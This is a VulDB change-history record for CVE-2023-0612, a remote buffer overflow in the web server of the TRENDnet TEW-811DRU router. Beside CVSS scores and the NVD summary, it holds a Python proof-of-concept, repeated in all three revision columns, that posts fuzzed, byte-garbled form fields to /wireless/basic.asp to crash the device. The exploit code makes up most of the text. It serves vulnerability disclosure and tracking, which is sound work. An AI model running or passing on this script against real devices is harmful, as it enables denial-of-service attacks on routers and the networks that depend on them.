フィールド | 2023年02月01日 17:52 | 2023年03月01日 11:16 | 2023年03月01日 11:23 |
---|
vendor | TRENDnet | TRENDnet | TRENDnet |
name | TEW-811DRU | TEW-811DRU | TEW-811DRU |
version | 1.0.10.0 | 1.0.10.0 | 1.0.10.0 |
component | httpd | httpd | httpd |
file | /wireless/basic.asp | /wireless/basic.asp | /wireless/basic.asp |
argument | | | |
cwe | 120 (メモリ破損) | 120 (メモリ破損) | 120 (メモリ破損) |
risk | 2 | 2 | 2 |
cvss3_vuldb_av | N | N | N |
cvss3_vuldb_ac | L | L | L |
cvss3_vuldb_pr | N | N | N |
cvss3_vuldb_ui | N | N | N |
cvss3_vuldb_s | U | U | U |
cvss3_vuldb_c | N | N | N |
cvss3_vuldb_i | N | N | N |
cvss3_vuldb_a | H | H | H |
cvss3_vuldb_e | P | P | P |
cvss3_vuldb_rc | R | R | R |
availability | 1 | 1 | 1 |
publicity | 1 | 1 | 1 |
cve | CVE-2023-0612 | CVE-2023-0612 | CVE-2023-0612 |
responsible | VulDB | VulDB | VulDB |
date | 1675206000 (2023年02月01日) | 1675206000 (2023年02月01日) | 1675206000 (2023年02月01日) |
cvss2_vuldb_av | N | N | N |
cvss2_vuldb_ac | L | L | L |
cvss2_vuldb_au | N | N | N |
cvss2_vuldb_ci | N | N | N |
cvss2_vuldb_ii | N | N | N |
cvss2_vuldb_ai | C | C | C |
cvss2_vuldb_e | POC | POC | POC |
cvss2_vuldb_rc | UR | UR | UR |
cvss2_vuldb_rl | ND | ND | ND |
cvss3_vuldb_rl | X | X | X |
cvss2_vuldb_basescore | 7.8 | 7.8 | 7.8 |
cvss2_vuldb_tempscore | 6.7 | 6.7 | 6.7 |
cvss3_vuldb_basescore | 7.5 | 7.5 | 7.5 |
cvss3_vuldb_tempscore | 6.8 | 6.8 | 6.8 |
cvss3_meta_basescore | 7.5 | 7.5 | 7.5 |
cvss3_meta_tempscore | 6.8 | 6.8 | 7.3 |
price_0day | $0-$5k | $0-$5k | $0-$5k |
language | Python | Python | Python |
sourcecode | import requests,socket
import re
import time
from urllib.parse import urlencode
device_web_ip = '192.168.10.1'
request = {'HEAD':
{'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': b'applic?tiHHHHHHHHHHHHHHHHHHHcoded',
'Content-Length': '2365',
'Origin': 'http://0.0.0.0:8080',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8080/wireless/basic.asp',
'Cookie': 'expandable=3c',
'Upgrade-Insecure-Requests': '1'
},
'PARAM':
{'page': '/wireless/basic.asp',
b'\xff\x99\xc3\x8a\x02\xff\x7f\\L\xc3\x99\xc3': 'O9SAG0h7UFyvCrT4fVAX',
b'wl_inpt': b'1',
'wl_bssid': 2,
'wl_bss_enabled': b'0\xc9\x8b\xc2\x8f',
b'wl_\xef\x00\x14\x00\x01': 0,
'wl_ssid': 'dummy',
b'l\x80cl\xff\xff\xff': 0,
'wl_chanspec': 40,
b'wl_\x90l_\x90': 4,
'wl_wds0': '00:0c:29:d9:40:fe',
b'll\x10': '00:0c:29:d9:40:ff',
'wl_wds2': '00:0c:29:d1:40:fe',
b'q\xff\xffzwq\xff\xff': '00:0d:29:d9:40:fe',
b'\x81\x80wwwwwww|wwwwwwwww': 0,
b'wl\xff\xff\xff\x04\x00timeout': 1,
b'\x00\x10\x7f\x89FF': 0,
'wl_country_code': b'\x00\x80',
'wl_country_rev': 27,
'wl_radio': b'\x1e',
'wl_nband': 1,
'wl_txchain': 3,
'wl_rxchain': b'3',
'wl_nmode_protection': 'auto',
'wl_vlan_prio_mode': b'Rl\x80\x80',
'wl_rate': 0,
'wl_rateset': b'h',
'wl_mrate': 0,
'wl_bcmdcs': 'off',
'wl_antdiv': -1,
'wl_reg_mode': 'off',
'wl_tpc_db': b'00',
'wl_obss_coex': b'1',
'wl_frag': 2346,
'wl_rts': b'3@',
'wl_dtim': b'\x7f',
b'\x85\xff\x10\x05\xff': 100,
'wl_bcn_rotate': b'1',
'wl_maxassoc': 128,
'wl_frameburst': b'j\\',
'wl_ampdu': b'V\x82',
'wl_rifs': b'~\x9boo',
'wl_rifs_advert': b'au\x7fo',
'wl_stbc_tx': b'\x03',
'wl_wme': b'nn',
'wl_wme_no_ack': b'\x10\x00\x9a',
b'_w\xff\xff': 'on',
'wme_ap': b'(\x9e\x80',
'wl_wme_ap_be': 5,
'wl_wme_ap_be0': b'\x861',
'wl_wme_ap_be1': 63,
'wl_wme_ap_be2': 3,
'wl_wme_ap_be3': 0,
'wl_wme_ap_be4': 0,
b'w\x05\xff\xff\x85e_a\x87_beD': 'off',
'wl_wme_ap_be6': b'\x9a',
'wl_wme_ap_bk': 5,
'wl_wme_ap_bk0': b'\xc3\xbc',
b'wl_wm{_apZbk1': 1023,
'wl_wme_ap_bk2': 7,
'wl_wme_ap_bk3': b'008',
'wl_wme_ap_bk4': 0,
'wl_wme_ap_bk5': b'ofo',
'wl_wme_ap_bk6': b'\x80\x80\x00\xdb',
'wl_wme_ap_vi': 5,
'wl_wme_ap_vi0': 7,
'wl_wme_ap_vi1': b'1G\xc3G',
b'wl_sLe_ap_vi\x80l_sLe_ap_vi2': 1,
'wl_wme_ap_vi3': 6016,
'wl_wme_ap_vi4': b'\x03\xe8d\xee\xad',
'wl_wme_ap_vi5': b'\xff\xff\x17',
'wl_wme_ap_vi6': 'off',
b'wl[wmeIap_vo': 5,
'wl_wme_ap_vo0': 3,
'wl_wme_ap_vo1': b'\xc3\xae\xf5',
'wl_wme_ap_vo2': 1,
'wl_wme_ap_vo3': b'\xff\x05\xff\xff',
'wl_wme_ap_vo4': b'P',
b'[lZwne_ap_vd5': b'\xc2\xbf\xc2\x92offf',
'wl_wme_ap_vo6': b'oLd',
b'ws]\xc2\x90\xc2\x90Ke': b'x',
'wl_wme_sta_be': 5,
'wl_wme_sta_be0': 15,
b'\xf1\x00\xff\x0f': 1023,
'wl_wme_sta_be2': 3,
b'wl_w\x00\x00\x01\x00ta_b\x93\xe8': b'\x81_',
b't\x81\x803t\x81a3': 0,
'wl_wme_sta_be5': b'oof',
'wl_wme_sta_be6': b'boff',
'wl_wme_sta_bk': 5,
'wl_wme_sta_bk0': 15,
'wl_wme_sta_bk1': 1023,
'wl_wme_sta_bk2': 7,
b'w\x80\x81\xff\x85m_sta[bk3': b'\x7f',
'wl_wme_sta_bk4': 0,
'wl_wme_sta_bk5': b'd',
'wl_wme_sta_bk6': 'off',
'wl_wme_sta_vi': 5,
b'wlTwulTwuekQ\x84': 7,
'wl_wme_sta_vi1': 15,
'wl_wme_sta_vi2': 2,
'wl_wme_sta_vi3': 6016,
'wl_wme_sta_vi4': 3008,
'wl_wme_sta_vi5': 'off',
'wl_wme_sta_vi6': 'off',
'wl_wme_sta_vo': 5,
b'wP_wme_s\x00\x01\xff\xe7\x070': 3,
'wl_wme_sta_vo1': 7,
b'\x81_7\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x8f_vol__sta': 2,
'wl_wme_sta_vo3': b'\x80\x00\x80\x0164',
b'wl_\x98me_sta_\x96o4': b'\xed\x00\x00\x00',
'wl_wme_sta_vo5': b'Qff',
'wl_wme_sta_vo6': 'off',
'wme_txp': 8,
'wl_wme_txp_be0': 7,
b'\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02': b'\x90',
'wl_wme_txp_be2': 4,
'wl_wme_txp_be3': 2,
'wl_wme_txp_be4': 0,
'wl_wme_txp_bk': 5,
'wl_wme_txp_bk0': b'O',
b'_wmwme_txp_\x85k1': 3,
'wl_wme_txp_bk2': 4,
'wl_wme_txp_bk3': 2,
'wl_wme_txp_bk4': 0,
'wl_wme_txp_vi': 5,
'wl_wme_txp_vi0': 7,
'wl_wme_txp_vi1': 3,
'wl_wme_txp_vi2': 4,
'wl_wme_txp_vi3': 2,
'wl_wme_txp_vi4': 0,
'wl_wme_txp_vo': 5,
b'wl_w\x0b\x0b\n\x0bxp_vo0': 7,
b't\x01': b'M',
b'l_wme_me_txp_txp__tx': 4,
'wl_wme_txp_vo3': b':',
'wl_wme_txp_vo4': 0,
'wl_mode': 'ap',
'wl_ure': 0,
'wl_bridge': 0,
'wl_vlan_prio_mode__117_66oo': b'ome',
b'/wipeless/basic.asp': b'',
b'B\xc3\xa3\xc2\xa5': b'\x7f\xff\xff\xff',
'wan_summary_2_pppoe_username': '',
'mainform_submit': '',
b'/tapppp.cgi': '',
'openheader': b''
},
'ATTR':
{'URL': 'http://{}/wireless/basic.asp'.format(device_web_ip),
'METHOD': 'POST',
'VERSION': 'HTTP/1.1'
}
}
headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
try:
r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5)
except Exception as e:
print('error:{}'.format(e)) | import requests,socket
import re
import time
from urllib.parse import urlencode
device_web_ip = '192.168.10.1'
request = {'HEAD':
{'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': b'applic?tiHHHHHHHHHHHHHHHHHHHcoded',
'Content-Length': '2365',
'Origin': 'http://0.0.0.0:8080',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8080/wireless/basic.asp',
'Cookie': 'expandable=3c',
'Upgrade-Insecure-Requests': '1'
},
'PARAM':
{'page': '/wireless/basic.asp',
b'\xff\x99\xc3\x8a\x02\xff\x7f\\L\xc3\x99\xc3': 'O9SAG0h7UFyvCrT4fVAX',
b'wl_inpt': b'1',
'wl_bssid': 2,
'wl_bss_enabled': b'0\xc9\x8b\xc2\x8f',
b'wl_\xef\x00\x14\x00\x01': 0,
'wl_ssid': 'dummy',
b'l\x80cl\xff\xff\xff': 0,
'wl_chanspec': 40,
b'wl_\x90l_\x90': 4,
'wl_wds0': '00:0c:29:d9:40:fe',
b'll\x10': '00:0c:29:d9:40:ff',
'wl_wds2': '00:0c:29:d1:40:fe',
b'q\xff\xffzwq\xff\xff': '00:0d:29:d9:40:fe',
b'\x81\x80wwwwwww|wwwwwwwww': 0,
b'wl\xff\xff\xff\x04\x00timeout': 1,
b'\x00\x10\x7f\x89FF': 0,
'wl_country_code': b'\x00\x80',
'wl_country_rev': 27,
'wl_radio': b'\x1e',
'wl_nband': 1,
'wl_txchain': 3,
'wl_rxchain': b'3',
'wl_nmode_protection': 'auto',
'wl_vlan_prio_mode': b'Rl\x80\x80',
'wl_rate': 0,
'wl_rateset': b'h',
'wl_mrate': 0,
'wl_bcmdcs': 'off',
'wl_antdiv': -1,
'wl_reg_mode': 'off',
'wl_tpc_db': b'00',
'wl_obss_coex': b'1',
'wl_frag': 2346,
'wl_rts': b'3@',
'wl_dtim': b'\x7f',
b'\x85\xff\x10\x05\xff': 100,
'wl_bcn_rotate': b'1',
'wl_maxassoc': 128,
'wl_frameburst': b'j\\',
'wl_ampdu': b'V\x82',
'wl_rifs': b'~\x9boo',
'wl_rifs_advert': b'au\x7fo',
'wl_stbc_tx': b'\x03',
'wl_wme': b'nn',
'wl_wme_no_ack': b'\x10\x00\x9a',
b'_w\xff\xff': 'on',
'wme_ap': b'(\x9e\x80',
'wl_wme_ap_be': 5,
'wl_wme_ap_be0': b'\x861',
'wl_wme_ap_be1': 63,
'wl_wme_ap_be2': 3,
'wl_wme_ap_be3': 0,
'wl_wme_ap_be4': 0,
b'w\x05\xff\xff\x85e_a\x87_beD': 'off',
'wl_wme_ap_be6': b'\x9a',
'wl_wme_ap_bk': 5,
'wl_wme_ap_bk0': b'\xc3\xbc',
b'wl_wm{_apZbk1': 1023,
'wl_wme_ap_bk2': 7,
'wl_wme_ap_bk3': b'008',
'wl_wme_ap_bk4': 0,
'wl_wme_ap_bk5': b'ofo',
'wl_wme_ap_bk6': b'\x80\x80\x00\xdb',
'wl_wme_ap_vi': 5,
'wl_wme_ap_vi0': 7,
'wl_wme_ap_vi1': b'1G\xc3G',
b'wl_sLe_ap_vi\x80l_sLe_ap_vi2': 1,
'wl_wme_ap_vi3': 6016,
'wl_wme_ap_vi4': b'\x03\xe8d\xee\xad',
'wl_wme_ap_vi5': b'\xff\xff\x17',
'wl_wme_ap_vi6': 'off',
b'wl[wmeIap_vo': 5,
'wl_wme_ap_vo0': 3,
'wl_wme_ap_vo1': b'\xc3\xae\xf5',
'wl_wme_ap_vo2': 1,
'wl_wme_ap_vo3': b'\xff\x05\xff\xff',
'wl_wme_ap_vo4': b'P',
b'[lZwne_ap_vd5': b'\xc2\xbf\xc2\x92offf',
'wl_wme_ap_vo6': b'oLd',
b'ws]\xc2\x90\xc2\x90Ke': b'x',
'wl_wme_sta_be': 5,
'wl_wme_sta_be0': 15,
b'\xf1\x00\xff\x0f': 1023,
'wl_wme_sta_be2': 3,
b'wl_w\x00\x00\x01\x00ta_b\x93\xe8': b'\x81_',
b't\x81\x803t\x81a3': 0,
'wl_wme_sta_be5': b'oof',
'wl_wme_sta_be6': b'boff',
'wl_wme_sta_bk': 5,
'wl_wme_sta_bk0': 15,
'wl_wme_sta_bk1': 1023,
'wl_wme_sta_bk2': 7,
b'w\x80\x81\xff\x85m_sta[bk3': b'\x7f',
'wl_wme_sta_bk4': 0,
'wl_wme_sta_bk5': b'd',
'wl_wme_sta_bk6': 'off',
'wl_wme_sta_vi': 5,
b'wlTwulTwuekQ\x84': 7,
'wl_wme_sta_vi1': 15,
'wl_wme_sta_vi2': 2,
'wl_wme_sta_vi3': 6016,
'wl_wme_sta_vi4': 3008,
'wl_wme_sta_vi5': 'off',
'wl_wme_sta_vi6': 'off',
'wl_wme_sta_vo': 5,
b'wP_wme_s\x00\x01\xff\xe7\x070': 3,
'wl_wme_sta_vo1': 7,
b'\x81_7\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x8f_vol__sta': 2,
'wl_wme_sta_vo3': b'\x80\x00\x80\x0164',
b'wl_\x98me_sta_\x96o4': b'\xed\x00\x00\x00',
'wl_wme_sta_vo5': b'Qff',
'wl_wme_sta_vo6': 'off',
'wme_txp': 8,
'wl_wme_txp_be0': 7,
b'\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02': b'\x90',
'wl_wme_txp_be2': 4,
'wl_wme_txp_be3': 2,
'wl_wme_txp_be4': 0,
'wl_wme_txp_bk': 5,
'wl_wme_txp_bk0': b'O',
b'_wmwme_txp_\x85k1': 3,
'wl_wme_txp_bk2': 4,
'wl_wme_txp_bk3': 2,
'wl_wme_txp_bk4': 0,
'wl_wme_txp_vi': 5,
'wl_wme_txp_vi0': 7,
'wl_wme_txp_vi1': 3,
'wl_wme_txp_vi2': 4,
'wl_wme_txp_vi3': 2,
'wl_wme_txp_vi4': 0,
'wl_wme_txp_vo': 5,
b'wl_w\x0b\x0b\n\x0bxp_vo0': 7,
b't\x01': b'M',
b'l_wme_me_txp_txp__tx': 4,
'wl_wme_txp_vo3': b':',
'wl_wme_txp_vo4': 0,
'wl_mode': 'ap',
'wl_ure': 0,
'wl_bridge': 0,
'wl_vlan_prio_mode__117_66oo': b'ome',
b'/wipeless/basic.asp': b'',
b'B\xc3\xa3\xc2\xa5': b'\x7f\xff\xff\xff',
'wan_summary_2_pppoe_username': '',
'mainform_submit': '',
b'/tapppp.cgi': '',
'openheader': b''
},
'ATTR':
{'URL': 'http://{}/wireless/basic.asp'.format(device_web_ip),
'METHOD': 'POST',
'VERSION': 'HTTP/1.1'
}
}
headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
try:
r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5)
except Exception as e:
print('error:{}'.format(e)) | import requests,socket
import re
import time
from urllib.parse import urlencode
device_web_ip = '192.168.10.1'
request = {'HEAD':
{'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': b'applic?tiHHHHHHHHHHHHHHHHHHHcoded',
'Content-Length': '2365',
'Origin': 'http://0.0.0.0:8080',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8080/wireless/basic.asp',
'Cookie': 'expandable=3c',
'Upgrade-Insecure-Requests': '1'
},
'PARAM':
{'page': '/wireless/basic.asp',
b'\xff\x99\xc3\x8a\x02\xff\x7f\\L\xc3\x99\xc3': 'O9SAG0h7UFyvCrT4fVAX',
b'wl_inpt': b'1',
'wl_bssid': 2,
'wl_bss_enabled': b'0\xc9\x8b\xc2\x8f',
b'wl_\xef\x00\x14\x00\x01': 0,
'wl_ssid': 'dummy',
b'l\x80cl\xff\xff\xff': 0,
'wl_chanspec': 40,
b'wl_\x90l_\x90': 4,
'wl_wds0': '00:0c:29:d9:40:fe',
b'll\x10': '00:0c:29:d9:40:ff',
'wl_wds2': '00:0c:29:d1:40:fe',
b'q\xff\xffzwq\xff\xff': '00:0d:29:d9:40:fe',
b'\x81\x80wwwwwww|wwwwwwwww': 0,
b'wl\xff\xff\xff\x04\x00timeout': 1,
b'\x00\x10\x7f\x89FF': 0,
'wl_country_code': b'\x00\x80',
'wl_country_rev': 27,
'wl_radio': b'\x1e',
'wl_nband': 1,
'wl_txchain': 3,
'wl_rxchain': b'3',
'wl_nmode_protection': 'auto',
'wl_vlan_prio_mode': b'Rl\x80\x80',
'wl_rate': 0,
'wl_rateset': b'h',
'wl_mrate': 0,
'wl_bcmdcs': 'off',
'wl_antdiv': -1,
'wl_reg_mode': 'off',
'wl_tpc_db': b'00',
'wl_obss_coex': b'1',
'wl_frag': 2346,
'wl_rts': b'3@',
'wl_dtim': b'\x7f',
b'\x85\xff\x10\x05\xff': 100,
'wl_bcn_rotate': b'1',
'wl_maxassoc': 128,
'wl_frameburst': b'j\\',
'wl_ampdu': b'V\x82',
'wl_rifs': b'~\x9boo',
'wl_rifs_advert': b'au\x7fo',
'wl_stbc_tx': b'\x03',
'wl_wme': b'nn',
'wl_wme_no_ack': b'\x10\x00\x9a',
b'_w\xff\xff': 'on',
'wme_ap': b'(\x9e\x80',
'wl_wme_ap_be': 5,
'wl_wme_ap_be0': b'\x861',
'wl_wme_ap_be1': 63,
'wl_wme_ap_be2': 3,
'wl_wme_ap_be3': 0,
'wl_wme_ap_be4': 0,
b'w\x05\xff\xff\x85e_a\x87_beD': 'off',
'wl_wme_ap_be6': b'\x9a',
'wl_wme_ap_bk': 5,
'wl_wme_ap_bk0': b'\xc3\xbc',
b'wl_wm{_apZbk1': 1023,
'wl_wme_ap_bk2': 7,
'wl_wme_ap_bk3': b'008',
'wl_wme_ap_bk4': 0,
'wl_wme_ap_bk5': b'ofo',
'wl_wme_ap_bk6': b'\x80\x80\x00\xdb',
'wl_wme_ap_vi': 5,
'wl_wme_ap_vi0': 7,
'wl_wme_ap_vi1': b'1G\xc3G',
b'wl_sLe_ap_vi\x80l_sLe_ap_vi2': 1,
'wl_wme_ap_vi3': 6016,
'wl_wme_ap_vi4': b'\x03\xe8d\xee\xad',
'wl_wme_ap_vi5': b'\xff\xff\x17',
'wl_wme_ap_vi6': 'off',
b'wl[wmeIap_vo': 5,
'wl_wme_ap_vo0': 3,
'wl_wme_ap_vo1': b'\xc3\xae\xf5',
'wl_wme_ap_vo2': 1,
'wl_wme_ap_vo3': b'\xff\x05\xff\xff',
'wl_wme_ap_vo4': b'P',
b'[lZwne_ap_vd5': b'\xc2\xbf\xc2\x92offf',
'wl_wme_ap_vo6': b'oLd',
b'ws]\xc2\x90\xc2\x90Ke': b'x',
'wl_wme_sta_be': 5,
'wl_wme_sta_be0': 15,
b'\xf1\x00\xff\x0f': 1023,
'wl_wme_sta_be2': 3,
b'wl_w\x00\x00\x01\x00ta_b\x93\xe8': b'\x81_',
b't\x81\x803t\x81a3': 0,
'wl_wme_sta_be5': b'oof',
'wl_wme_sta_be6': b'boff',
'wl_wme_sta_bk': 5,
'wl_wme_sta_bk0': 15,
'wl_wme_sta_bk1': 1023,
'wl_wme_sta_bk2': 7,
b'w\x80\x81\xff\x85m_sta[bk3': b'\x7f',
'wl_wme_sta_bk4': 0,
'wl_wme_sta_bk5': b'd',
'wl_wme_sta_bk6': 'off',
'wl_wme_sta_vi': 5,
b'wlTwulTwuekQ\x84': 7,
'wl_wme_sta_vi1': 15,
'wl_wme_sta_vi2': 2,
'wl_wme_sta_vi3': 6016,
'wl_wme_sta_vi4': 3008,
'wl_wme_sta_vi5': 'off',
'wl_wme_sta_vi6': 'off',
'wl_wme_sta_vo': 5,
b'wP_wme_s\x00\x01\xff\xe7\x070': 3,
'wl_wme_sta_vo1': 7,
b'\x81_7\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x8f_vol__sta': 2,
'wl_wme_sta_vo3': b'\x80\x00\x80\x0164',
b'wl_\x98me_sta_\x96o4': b'\xed\x00\x00\x00',
'wl_wme_sta_vo5': b'Qff',
'wl_wme_sta_vo6': 'off',
'wme_txp': 8,
'wl_wme_txp_be0': 7,
b'\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02': b'\x90',
'wl_wme_txp_be2': 4,
'wl_wme_txp_be3': 2,
'wl_wme_txp_be4': 0,
'wl_wme_txp_bk': 5,
'wl_wme_txp_bk0': b'O',
b'_wmwme_txp_\x85k1': 3,
'wl_wme_txp_bk2': 4,
'wl_wme_txp_bk3': 2,
'wl_wme_txp_bk4': 0,
'wl_wme_txp_vi': 5,
'wl_wme_txp_vi0': 7,
'wl_wme_txp_vi1': 3,
'wl_wme_txp_vi2': 4,
'wl_wme_txp_vi3': 2,
'wl_wme_txp_vi4': 0,
'wl_wme_txp_vo': 5,
b'wl_w\x0b\x0b\n\x0bxp_vo0': 7,
b't\x01': b'M',
b'l_wme_me_txp_txp__tx': 4,
'wl_wme_txp_vo3': b':',
'wl_wme_txp_vo4': 0,
'wl_mode': 'ap',
'wl_ure': 0,
'wl_bridge': 0,
'wl_vlan_prio_mode__117_66oo': b'ome',
b'/wipeless/basic.asp': b'',
b'B\xc3\xa3\xc2\xa5': b'\x7f\xff\xff\xff',
'wan_summary_2_pppoe_username': '',
'mainform_submit': '',
b'/tapppp.cgi': '',
'openheader': b''
},
'ATTR':
{'URL': 'http://{}/wireless/basic.asp'.format(device_web_ip),
'METHOD': 'POST',
'VERSION': 'HTTP/1.1'
}
}
headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
try:
r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5)
except Exception as e:
print('error:{}'.format(e)) |
cve_assigned | | 1675206000 (2023年02月01日) | 1675206000 (2023年02月01日) |
cve_nvd_summary | | A vulnerability, which was classified as critical, was found in TRENDnet TEW-811DRU 1.0.10.0. Affected is an unknown function of the file /wireless/basic.asp of the component httpd. The manipulation leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219936. | A vulnerability, which was classified as critical, was found in TRENDnet TEW-811DRU 1.0.10.0. Affected is an unknown function of the file /wireless/basic.asp of the component httpd. The manipulation leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219936. |
cvss3_nvd_av | | | N |
cvss3_nvd_ac | | | L |
cvss3_nvd_pr | | | N |
cvss3_nvd_ui | | | N |
cvss3_nvd_s | | | U |
cvss3_nvd_c | | | N |
cvss3_nvd_i | | | N |
cvss3_nvd_a | | | H |
cvss2_nvd_av | | | N |
cvss2_nvd_ac | | | L |
cvss2_nvd_au | | | N |
cvss2_nvd_ci | | | N |
cvss2_nvd_ii | | | N |
cvss2_nvd_ai | | | C |
cvss3_cna_av | | | N |
cvss3_cna_ac | | | L |
cvss3_cna_pr | | | N |
cvss3_cna_ui | | | N |
cvss3_cna_s | | | U |
cvss3_cna_c | | | N |
cvss3_cna_i | | | N |
cvss3_cna_a | | | H |
cve_cna | | | VulDB |
cvss2_nvd_basescore | | | 7.8 |
cvss3_nvd_basescore | | | 7.5 |
cvss3_cna_basescore | | | 7.5 |